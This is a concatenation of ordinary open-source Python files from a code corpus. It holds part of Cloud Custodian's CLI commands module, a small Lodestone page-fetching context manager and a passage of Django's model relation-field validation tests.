@policy_command
def report(options, policies):
if len(policies) == 0:
log.error('Error: must supply at least one policy')
sys.exit(1)
resources = set([p.resource_type for p in policies])
if len(resources) > 1:
log.error('Error: Report subcommand can accept multiple policies, '
'but they must all be for the same resource.')
sys.exit(1)
delta = timedelta(days=options.days)
begin_date = datetime.now() - delta
do_report(
policies, begin_date, options, sys.stdout, raw_output_fh=options.raw)
@policy_command
def logs(options, policies):
if len(policies) != 1:
log.error("Log subcommand requires exactly one policy")
sys.exit(1)
policy = policies.pop()
for e in policy.get_logs(options.start, options.end):
print("%s: %s" % (
time.strftime(
"%Y-%m-%d %H:%M:%S", time.localtime(e['timestamp'] / 1000)),
e['message']))
def _schema_get_docstring(starting_class):
""" Given a class, return its docstring.
If no docstring is present for the class, search base classes in MRO for a
docstring.
"""
for cls in inspect.getmro(starting_class):
if inspect.getdoc(cls):
return inspect.getdoc(cls)
def schema_completer(prefix):
""" For tab-completion via argcomplete, return completion options.
For the given prefix so far, return the possible options. Note that
filtering via startswith happens after this list is returned.
"""
load_resources()
components = prefix.split('.')
if components[0] in provider.clouds.keys():
cloud_provider = components.pop(0)
provider_resources = provider.resources(cloud_provider)
else:
cloud_provider = 'aws'
provider_resources = provider.resources('aws')
components[0] = "aws.%s" % components[0]
# Completions for resource
if len(components) == 1:
choices = [r for r in provider.resources().keys()
if r.startswith(components[0])]
if len(choices) == 1:
choices += ['{}{}'.format(choices[0], '.')]
return choices
if components[0] not in provider_resources.keys():
return []
# Completions for category
if len(components) == 2:
choices = ['{}.{}'.format(components[0], x)
for x in ('actions', 'filters') if x.startswith(components[1])]
if len(choices) == 1:
choices += ['{}{}'.format(choices[0], '.')]
return choices
# Completions for item
elif len(components) == 3:
resource_mapping = schema.resource_vocabulary(cloud_provider)
return ['{}.{}.{}'.format(components[0], components[1], x)
for x in resource_mapping[components[0]][components[1]]]
return []
def schema_cmd(options):
""" Print info about the resources, actions and filters available. """
if options.json:
schema.json_dump(options.resource)
return
load_resources()
resource_mapping = schema.resource_vocabulary()
if options.summary:
schema.summary(resource_mapping)
return
# Here are the formats for what we accept:
# - No argument
# - List all available RESOURCES
# - RESOURCE
# - List all available actions and filters for supplied RESOURCE
# - RESOURCE.actions
# - List all available actions for supplied RESOURCE
# - RESOURCE.actions.ACTION
# - Show class doc string and schema for supplied action
# - RESOURCE.filters
# - List all available filters for supplied RESOURCE
# - RESOURCE.filters.FILTER
# - Show class doc string and schema for supplied filter
if not options.resource:
resource_list = {'resources': sorted(provider.resources().keys())}
print(yaml.safe_dump(resource_list, default_flow_style=False))
return
# Format is [PROVIDER].RESOURCE.CATEGORY.ITEM
# optional provider defaults to aws for compatibility
components = options.resource.split('.')
if components[0] in provider.clouds.keys():
cloud_provider = components.pop(0)
resource_mapping = schema.resource_vocabulary(
cloud_provider)
components[0] = '%s.%s' % (cloud_provider, components[0])
else:
resource_mapping = schema.resource_vocabulary('aws')
components[0] = 'aws.%s' % components[0]
#
# Handle resource
#
resource = components[0].lower()
if resource not in resource_mapping:
log.error('{} is not a valid resource'.format(resource))
sys.exit(1)
if len(components) == 1:
del(resource_mapping[resource]['classes'])
output = {resource: resource_mapping[resource]}
print(yaml.safe_dump(output))
return
#
# Handle category
#
category = components[1].lower()
if category not in ('actions', 'filters'):
log.error("Valid choices are 'actions' and 'filters'. You supplied '{}'".format(category))
sys.exit(1)
if len(components) == 2:
output = "No {} available for resource {}.".format(category, resource)
if category in resource_mapping[resource]:
output = {resource: {
category: resource_mapping[resource][category]}}
print(yaml.safe_dump(output))
return
#
# Handle item
#
item = components[2].lower()
if item not in resource_mapping[resource][category]:
log.error('{} is not in the {} list for resource {}'.format(item, category, resource))
sys.exit(1)
if len(components) == 3:
cls = resource_mapping[resource]['classes'][category][item]
# Print docstring
docstring = _schema_get_docstring(cls)
print("\nHelp\n----\n")
if docstring:
print(docstring)
else:
# Shouldn't ever hit this, so exclude from cover
print("No help is available for this item.") # pragma: no cover
# Print schema
print("\nSchema\n------\n")
if hasattr(cls, 'schema'):
print(json.dumps(cls.schema, indent=4))
else:
# Shouldn't ever hit this, so exclude from cover
print("No schema is available for this item.", file=sys.sterr) # pragma: no cover
print('')
return
# We received too much (e.g. s3.actions.foo.bar)
log.error("Invalid selector '{}'. Max of 3 components in the "
"format RESOURCE.CATEGORY.ITEM".format(options.resource))
sys.exit(1)
def _metrics_get_endpoints(options):
""" Determine the start and end dates based on user-supplied options. """
if bool(options.start) ^ bool(options.end):
log.error('--start and --end must be specified together')
sys.exit(1)
if options.start and options.end:
start = options.start
end = options.end
else:
end = datetime.utcnow()
start = end - timedelta(options.days)
return start, end
@policy_command
def metrics_cmd(options, policies):
start, end = _metrics_get_endpoints(options)
data = {}
for p in policies:
log.info('Getting %s metrics', p)
data[p.name] = p.get_metrics(start, end, options.period)
print(dumps(data, indent=2))
def version_cmd(options):
from c7n.version import version
if not options.debug:
print(version)
return
indent = 13
pp = pprint.PrettyPrinter(indent=indent)
print("\nPlease copy/paste the following info along with any bug reports:\n")
print("Custodian: ", version)
pyversion = sys.version.replace('\n', '\n' + ' ' * indent) # For readability
print("Python: ", pyversion)
# os.uname is only available on recent versions of Unix
try:
print("Platform: ", os.uname())
except Exception: # pragma: no cover
print("Platform: ", sys.platform)
print("Using venv: ", hasattr(sys, 'real_prefix'))
print("PYTHONPATH: ")
pp.pprint(sys.path)
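# Selector examples for schema_cmd (a hedged sketch; the exact resource and
# filter names available depend on the installed custodian version):
#
#   custodian schema                              # list all resources
#   custodian schema aws.ec2                      # actions and filters for EC2
#   custodian schema aws.ec2.filters              # filters only
#   custodian schema aws.ec2.filters.tag-count    # docstring plus JSON schema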
| {
"content_hash": "b1537fada0a2597e04504e5106aad487",
"timestamp": "",
"source": "github",
"line_count": 460,
"max_line_length": 98,
"avg_line_length": 32.87826086956522,
"alnum_prop": 0.592964824120603,
"repo_name": "JohnTheodore/cloud-custodian",
"id": "972e4046b03ffd82d0a74d7c99bc4d63d5a5e5ac",
"size": "15714",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "c7n/commands.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "6346"
},
{
"name": "Python",
"bytes": "2533086"
}
],
"symlink_target": ""
} |
from api import app
from api.constants import USER_AGENT
from api.exceptions import InvalidRequest
from lxml import html
from requests import get
class HTMLFromLoadstone(object):
def __init__(self, url):
self.url = url
def __enter__(self):
app.logger.debug('Attempting to parse url {}'.format(self.url))
headers = {'User-Agent': USER_AGENT}
page = get(self.url, headers=headers)
if page.status_code == 404:
raise InvalidRequest('Lodestone ID does not exist')
assert page.status_code == 200
return html.fromstring(page.text)
def __exit__(self, exc_type, exc_val, exc_tb):
pass
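# Usage sketch (not part of the original module; the URL below is a
# hypothetical Lodestone character page):
#
#   url = 'http://na.finalfantasyxiv.com/lodestone/character/1234567/'
#   with HTMLFromLoadstone(url) as tree:
#       title = tree.xpath('//title/text()')
#
# __enter__ fetches the page with the module's User-Agent header, raises
# InvalidRequest on a 404, and returns the parsed lxml HTML tree.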
| {
"content_hash": "329401ddd50c3eb43a0b59366530966f",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 71,
"avg_line_length": 25.846153846153847,
"alnum_prop": 0.6428571428571429,
"repo_name": "Demotivated/loadstone",
"id": "c57f50f02f3c0b860d482e4a36090504a1e2167f",
"size": "672",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/scrapers/context_managers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38682"
}
],
"symlink_target": ""
} |
from unittest import mock
from django.core.checks import Error, Warning as DjangoWarning
from django.db import connection, models
from django.db.models.fields.related import ForeignObject
from django.test.testcases import SimpleTestCase
from django.test.utils import isolate_apps, override_settings
@isolate_apps('invalid_models_tests')
class RelativeFieldTests(SimpleTestCase):
def test_valid_foreign_key_without_accessor(self):
class Target(models.Model):
# There would be a clash if Model.field installed an accessor.
model = models.IntegerField()
class Model(models.Model):
field = models.ForeignKey(Target, models.CASCADE, related_name='+')
field = Model._meta.get_field('field')
self.assertEqual(field.check(), [])
def test_foreign_key_to_missing_model(self):
# Model names are resolved when a model is being created, so we cannot
# test relative fields in isolation and we need to attach them to a
# model.
class Model(models.Model):
foreign_key = models.ForeignKey('Rel1', models.CASCADE)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(), [
Error(
"Field defines a relation with model 'Rel1', "
"which is either not installed, or is abstract.",
obj=field,
id='fields.E300',
),
])
@isolate_apps('invalid_models_tests')
def test_foreign_key_to_isolate_apps_model(self):
"""
#25723 - Referenced model registration lookup should be run against the
field's model registry.
"""
class OtherModel(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('OtherModel', models.CASCADE)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(from_model=Model), [])
def test_many_to_many_to_missing_model(self):
class Model(models.Model):
m2m = models.ManyToManyField("Rel2")
field = Model._meta.get_field('m2m')
self.assertEqual(field.check(from_model=Model), [
Error(
"Field defines a relation with model 'Rel2', "
"which is either not installed, or is abstract.",
obj=field,
id='fields.E300',
),
])
@isolate_apps('invalid_models_tests')
def test_many_to_many_to_isolate_apps_model(self):
"""
#25723 - Referenced model registration lookup should be run against the
field's model registry.
"""
class OtherModel(models.Model):
pass
class Model(models.Model):
m2m = models.ManyToManyField('OtherModel')
field = Model._meta.get_field('m2m')
self.assertEqual(field.check(from_model=Model), [])
def test_many_to_many_with_limit_choices_auto_created_no_warning(self):
class Model(models.Model):
name = models.CharField(max_length=20)
class ModelM2M(models.Model):
m2m = models.ManyToManyField(Model, limit_choices_to={'name': 'test_name'})
self.assertEqual(ModelM2M.check(), [])
def test_many_to_many_with_useless_options(self):
class Model(models.Model):
name = models.CharField(max_length=20)
class ModelM2M(models.Model):
m2m = models.ManyToManyField(
Model,
null=True,
validators=[lambda x: x],
limit_choices_to={'name': 'test_name'},
through='ThroughModel',
through_fields=('modelm2m', 'model'),
)
class ThroughModel(models.Model):
model = models.ForeignKey('Model', models.CASCADE)
modelm2m = models.ForeignKey('ModelM2M', models.CASCADE)
field = ModelM2M._meta.get_field('m2m')
self.assertEqual(ModelM2M.check(), [
DjangoWarning(
'null has no effect on ManyToManyField.',
obj=field,
id='fields.W340',
),
DjangoWarning(
'ManyToManyField does not support validators.',
obj=field,
id='fields.W341',
),
DjangoWarning(
'limit_choices_to has no effect on ManyToManyField '
'with a through model.',
obj=field,
id='fields.W343',
),
])
def test_ambiguous_relationship_model(self):
class Person(models.Model):
pass
class Group(models.Model):
field = models.ManyToManyField('Person', through="AmbiguousRelationship", related_name='tertiary')
class AmbiguousRelationship(models.Model):
# Too many foreign keys to Person.
first_person = models.ForeignKey(Person, models.CASCADE, related_name="first")
second_person = models.ForeignKey(Person, models.CASCADE, related_name="second")
second_model = models.ForeignKey(Group, models.CASCADE)
field = Group._meta.get_field('field')
self.assertEqual(field.check(from_model=Group), [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.field', but it has more than one "
"foreign key to 'Person', which is ambiguous. You must specify "
"which foreign key Django should use via the through_fields "
"keyword argument.",
hint=(
'If you want to create a recursive relationship, use '
'ForeignKey("self", symmetrical=False, through="AmbiguousRelationship").'
),
obj=field,
id='fields.E335',
),
])
def test_relationship_model_with_foreign_key_to_wrong_model(self):
class WrongModel(models.Model):
pass
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="InvalidRelationship")
class InvalidRelationship(models.Model):
person = models.ForeignKey(Person, models.CASCADE)
wrong_foreign_key = models.ForeignKey(WrongModel, models.CASCADE)
# The last foreign key should point to Group model.
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.members', but it does not "
"have a foreign key to 'Group' or 'Person'.",
obj=InvalidRelationship,
id='fields.E336',
),
])
def test_relationship_model_missing_foreign_key(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="InvalidRelationship")
class InvalidRelationship(models.Model):
group = models.ForeignKey(Group, models.CASCADE)
# No foreign key to Person
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.members', but it does not have "
"a foreign key to 'Group' or 'Person'.",
obj=InvalidRelationship,
id='fields.E336',
),
])
def test_missing_relationship_model(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="MissingM2MModel")
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [
Error(
"Field specifies a many-to-many relation through model "
"'MissingM2MModel', which has not been installed.",
obj=field,
id='fields.E331',
),
])
def test_missing_relationship_model_on_model_check(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through='MissingM2MModel')
self.assertEqual(Group.check(), [
Error(
"Field specifies a many-to-many relation through model "
"'MissingM2MModel', which has not been installed.",
obj=Group._meta.get_field('members'),
id='fields.E331',
),
])
@isolate_apps('invalid_models_tests')
def test_many_to_many_through_isolate_apps_model(self):
"""
#25723 - Through model registration lookup should be run against the
field's model registry.
"""
class GroupMember(models.Model):
person = models.ForeignKey('Person', models.CASCADE)
group = models.ForeignKey('Group', models.CASCADE)
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through='GroupMember')
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [])
def test_too_many_foreign_keys_in_self_referential_model(self):
class Person(models.Model):
friends = models.ManyToManyField('self', through="InvalidRelationship", symmetrical=False)
class InvalidRelationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set_2")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set_2")
third = models.ForeignKey(Person, models.CASCADE, related_name="too_many_by_far")
field = Person._meta.get_field('friends')
self.assertEqual(field.check(from_model=Person), [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Person.friends', but it has more than two "
"foreign keys to 'Person', which is ambiguous. You must specify "
"which two foreign keys Django should use via the through_fields "
"keyword argument.",
hint='Use through_fields to specify which two foreign keys Django should use.',
obj=InvalidRelationship,
id='fields.E333',
),
])
def test_foreign_key_to_abstract_model(self):
class AbstractModel(models.Model):
class Meta:
abstract = True
class Model(models.Model):
rel_string_foreign_key = models.ForeignKey('AbstractModel', models.CASCADE)
rel_class_foreign_key = models.ForeignKey(AbstractModel, models.CASCADE)
fields = [
Model._meta.get_field('rel_string_foreign_key'),
Model._meta.get_field('rel_class_foreign_key'),
]
expected_error = Error(
"Field defines a relation with model 'AbstractModel', "
"which is either not installed, or is abstract.",
id='fields.E300',
)
for field in fields:
expected_error.obj = field
self.assertEqual(field.check(), [expected_error])
def test_m2m_to_abstract_model(self):
class AbstractModel(models.Model):
class Meta:
abstract = True
class Model(models.Model):
rel_string_m2m = models.ManyToManyField('AbstractModel')
rel_class_m2m = models.ManyToManyField(AbstractModel)
fields = [
Model._meta.get_field('rel_string_m2m'),
Model._meta.get_field('rel_class_m2m'),
]
expected_error = Error(
"Field defines a relation with model 'AbstractModel', "
"which is either not installed, or is abstract.",
id='fields.E300',
)
for field in fields:
expected_error.obj = field
self.assertEqual(field.check(from_model=Model), [expected_error])
def test_unique_m2m(self):
class Person(models.Model):
name = models.CharField(max_length=5)
class Group(models.Model):
members = models.ManyToManyField('Person', unique=True)
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [
Error(
'ManyToManyFields cannot be unique.',
obj=field,
id='fields.E330',
),
])
def test_foreign_key_to_non_unique_field(self):
class Target(models.Model):
bad = models.IntegerField() # No unique=True
class Model(models.Model):
foreign_key = models.ForeignKey('Target', models.CASCADE, to_field='bad')
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(), [
Error(
"'Target.bad' must set unique=True because it is referenced by a foreign key.",
obj=field,
id='fields.E311',
),
])
def test_foreign_key_to_non_unique_field_under_explicit_model(self):
class Target(models.Model):
bad = models.IntegerField()
class Model(models.Model):
field = models.ForeignKey(Target, models.CASCADE, to_field='bad')
field = Model._meta.get_field('field')
self.assertEqual(field.check(), [
Error(
"'Target.bad' must set unique=True because it is referenced by a foreign key.",
obj=field,
id='fields.E311',
),
])
def test_foreign_object_to_non_unique_fields(self):
class Person(models.Model):
# Note that both fields are not unique.
country_id = models.IntegerField()
city_id = models.IntegerField()
class MMembership(models.Model):
person_country_id = models.IntegerField()
person_city_id = models.IntegerField()
person = models.ForeignObject(
Person,
on_delete=models.CASCADE,
from_fields=['person_country_id', 'person_city_id'],
to_fields=['country_id', 'city_id'],
)
field = MMembership._meta.get_field('person')
self.assertEqual(field.check(), [
Error(
"No subset of the fields 'country_id', 'city_id' on model 'Person' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
)
])
def test_on_delete_set_null_on_non_nullable_field(self):
class Person(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('Person', models.SET_NULL)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(), [
Error(
'Field specifies on_delete=SET_NULL, but cannot be null.',
hint='Set null=True argument on the field, or change the on_delete rule.',
obj=field,
id='fields.E320',
),
])
def test_on_delete_set_default_without_default_value(self):
class Person(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('Person', models.SET_DEFAULT)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(), [
Error(
'Field specifies on_delete=SET_DEFAULT, but has no default value.',
hint='Set a default value, or change the on_delete rule.',
obj=field,
id='fields.E321',
),
])
def test_nullable_primary_key(self):
class Model(models.Model):
field = models.IntegerField(primary_key=True, null=True)
field = Model._meta.get_field('field')
with mock.patch.object(connection.features, 'interprets_empty_strings_as_nulls', False):
results = field.check()
self.assertEqual(results, [
Error(
'Primary keys must not have null=True.',
hint='Set null=False on the field, or remove primary_key=True argument.',
obj=field,
id='fields.E007',
),
])
def test_not_swapped_model(self):
class SwappableModel(models.Model):
# A model that can be, but isn't swapped out. References to this
# model should *not* raise any validation error.
class Meta:
swappable = 'TEST_SWAPPABLE_MODEL'
class Model(models.Model):
explicit_fk = models.ForeignKey(
SwappableModel,
models.CASCADE,
related_name='explicit_fk',
)
implicit_fk = models.ForeignKey(
'invalid_models_tests.SwappableModel',
models.CASCADE,
related_name='implicit_fk',
)
explicit_m2m = models.ManyToManyField(SwappableModel, related_name='explicit_m2m')
implicit_m2m = models.ManyToManyField(
'invalid_models_tests.SwappableModel',
related_name='implicit_m2m',
)
explicit_fk = Model._meta.get_field('explicit_fk')
self.assertEqual(explicit_fk.check(), [])
implicit_fk = Model._meta.get_field('implicit_fk')
self.assertEqual(implicit_fk.check(), [])
explicit_m2m = Model._meta.get_field('explicit_m2m')
self.assertEqual(explicit_m2m.check(from_model=Model), [])
implicit_m2m = Model._meta.get_field('implicit_m2m')
self.assertEqual(implicit_m2m.check(from_model=Model), [])
@override_settings(TEST_SWAPPED_MODEL='invalid_models_tests.Replacement')
def test_referencing_to_swapped_model(self):
class Replacement(models.Model):
pass
class SwappedModel(models.Model):
class Meta:
swappable = 'TEST_SWAPPED_MODEL'
class Model(models.Model):
explicit_fk = models.ForeignKey(
SwappedModel,
models.CASCADE,
related_name='explicit_fk',
)
implicit_fk = models.ForeignKey(
'invalid_models_tests.SwappedModel',
models.CASCADE,
related_name='implicit_fk',
)
explicit_m2m = models.ManyToManyField(SwappedModel, related_name='explicit_m2m')
implicit_m2m = models.ManyToManyField(
'invalid_models_tests.SwappedModel',
related_name='implicit_m2m',
)
fields = [
Model._meta.get_field('explicit_fk'),
Model._meta.get_field('implicit_fk'),
Model._meta.get_field('explicit_m2m'),
Model._meta.get_field('implicit_m2m'),
]
expected_error = Error(
("Field defines a relation with the model "
"'invalid_models_tests.SwappedModel', which has been swapped out."),
hint="Update the relation to point at 'settings.TEST_SWAPPED_MODEL'.",
id='fields.E301',
)
for field in fields:
expected_error.obj = field
self.assertEqual(field.check(from_model=Model), [expected_error])
def test_related_field_has_invalid_related_name(self):
digit = 0
illegal_non_alphanumeric = '!'
whitespace = '\t'
invalid_related_names = [
'%s_begins_with_digit' % digit,
'%s_begins_with_illegal_non_alphanumeric' % illegal_non_alphanumeric,
'%s_begins_with_whitespace' % whitespace,
'contains_%s_illegal_non_alphanumeric' % illegal_non_alphanumeric,
'contains_%s_whitespace' % whitespace,
'ends_with_with_illegal_non_alphanumeric_%s' % illegal_non_alphanumeric,
'ends_with_whitespace_%s' % whitespace,
'with', # a Python keyword
'related_name\n',
'',
'，', # non-ASCII
]
class Parent(models.Model):
pass
for invalid_related_name in invalid_related_names:
Child = type('Child%s' % invalid_related_name, (models.Model,), {
'parent': models.ForeignKey('Parent', models.CASCADE, related_name=invalid_related_name),
'__module__': Parent.__module__,
})
field = Child._meta.get_field('parent')
self.assertEqual(Child.check(), [
Error(
"The name '%s' is invalid related_name for field Child%s.parent"
% (invalid_related_name, invalid_related_name),
hint="Related name must be a valid Python identifier or end with a '+'",
obj=field,
id='fields.E306',
),
])
def test_related_field_has_valid_related_name(self):
lowercase = 'a'
uppercase = 'A'
digit = 0
related_names = [
'%s_starts_with_lowercase' % lowercase,
            '%s_starts_with_uppercase' % uppercase,
'_starts_with_underscore',
'contains_%s_digit' % digit,
'ends_with_plus+',
'_+',
'+',
'試',
'試驗+',
]
class Parent(models.Model):
pass
for related_name in related_names:
Child = type('Child%s' % related_name, (models.Model,), {
'parent': models.ForeignKey('Parent', models.CASCADE, related_name=related_name),
'__module__': Parent.__module__,
})
self.assertEqual(Child.check(), [])
def test_to_fields_exist(self):
class Parent(models.Model):
pass
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(), [
Error(
"The to_field 'a' doesn't exist on the related model 'invalid_models_tests.Parent'.",
obj=field,
id='fields.E312',
),
Error(
"The to_field 'b' doesn't exist on the related model 'invalid_models_tests.Parent'.",
obj=field,
id='fields.E312',
),
])
def test_to_fields_not_checked_if_related_model_doesnt_exist(self):
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
parent = ForeignObject(
'invalid_models_tests.Parent',
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(), [
Error(
"Field defines a relation with model 'invalid_models_tests.Parent', "
"which is either not installed, or is abstract.",
id='fields.E300',
obj=field,
),
])
def test_invalid_related_query_name(self):
class Target(models.Model):
pass
class Model(models.Model):
first = models.ForeignKey(Target, models.CASCADE, related_name='contains__double')
second = models.ForeignKey(Target, models.CASCADE, related_query_name='ends_underscore_')
self.assertEqual(Model.check(), [
Error(
"Reverse query name 'contains__double' must not contain '__'.",
hint=("Add or change a related_name or related_query_name "
"argument for this field."),
obj=Model._meta.get_field('first'),
id='fields.E309',
),
Error(
"Reverse query name 'ends_underscore_' must not end with an "
"underscore.",
hint=("Add or change a related_name or related_query_name "
"argument for this field."),
obj=Model._meta.get_field('second'),
id='fields.E308',
),
])
@isolate_apps('invalid_models_tests')
class AccessorClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_accessor_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_fk(self):
self._test_accessor_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_m2m(self):
self._test_accessor_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE))
def test_m2m_to_integer(self):
self._test_accessor_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target'))
def test_m2m_to_fk(self):
self._test_accessor_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target'))
def test_m2m_to_m2m(self):
self._test_accessor_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target'))
def _test_accessor_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
model_set = target
class Model(models.Model):
rel = relative
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.rel' clashes with field name 'Target.model_set'.",
hint=("Rename field 'Target.model_set', or add/change "
"a related_name argument to the definition "
"for field 'Model.rel'."),
obj=Model._meta.get_field('rel'),
id='fields.E302',
),
])
def test_clash_between_accessors(self):
class Target(models.Model):
pass
class Model(models.Model):
foreign = models.ForeignKey(Target, models.CASCADE)
m2m = models.ManyToManyField(Target)
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.foreign' clashes with reverse accessor for 'Model.m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.foreign' or 'Model.m2m'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E304',
),
Error(
"Reverse accessor for 'Model.m2m' clashes with reverse accessor for 'Model.foreign'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.m2m' or 'Model.foreign'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E304',
),
])
def test_m2m_to_m2m_with_inheritance(self):
""" Ref #22047. """
class Target(models.Model):
pass
class Model(models.Model):
children = models.ManyToManyField('Child', related_name="m2m_clash", related_query_name="no_clash")
class Parent(models.Model):
m2m_clash = models.ManyToManyField('Target')
class Child(Parent):
pass
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.children' clashes with field name 'Child.m2m_clash'.",
hint=(
"Rename field 'Child.m2m_clash', or add/change a related_name "
"argument to the definition for field 'Model.children'."
),
obj=Model._meta.get_field('children'),
id='fields.E302',
)
])
def test_no_clash_for_hidden_related_name(self):
class Stub(models.Model):
pass
class ManyToManyRel(models.Model):
thing1 = models.ManyToManyField(Stub, related_name='+')
thing2 = models.ManyToManyField(Stub, related_name='+')
class FKRel(models.Model):
thing1 = models.ForeignKey(Stub, models.CASCADE, related_name='+')
thing2 = models.ForeignKey(Stub, models.CASCADE, related_name='+')
self.assertEqual(ManyToManyRel.check(), [])
self.assertEqual(FKRel.check(), [])
@isolate_apps('invalid_models_tests')
class ReverseQueryNameClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_reverse_query_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_fk(self):
self._test_reverse_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_m2m(self):
self._test_reverse_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE))
def test_m2m_to_integer(self):
self._test_reverse_query_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target'))
def test_m2m_to_fk(self):
self._test_reverse_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target'))
def test_m2m_to_m2m(self):
self._test_reverse_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target'))
def _test_reverse_query_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
model = target
class Model(models.Model):
rel = relative
self.assertEqual(Model.check(), [
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.model'.",
hint=(
"Rename field 'Target.model', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
])
@isolate_apps('invalid_models_tests')
class ExplicitRelatedNameClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_explicit_related_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_fk_to_fk(self):
self._test_explicit_related_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_fk_to_m2m(self):
self._test_explicit_related_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_m2m_to_integer(self):
self._test_explicit_related_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target', related_name='clash'))
def test_m2m_to_fk(self):
self._test_explicit_related_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target', related_name='clash'))
def test_m2m_to_m2m(self):
self._test_explicit_related_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target', related_name='clash'))
def _test_explicit_related_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
clash = target
class Model(models.Model):
rel = relative
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
])
@isolate_apps('invalid_models_tests')
class ExplicitRelatedQueryNameClashTests(SimpleTestCase):
def test_fk_to_integer(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_integer(self, related_name=None):
self.test_fk_to_integer(related_name='+')
def test_fk_to_fk(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
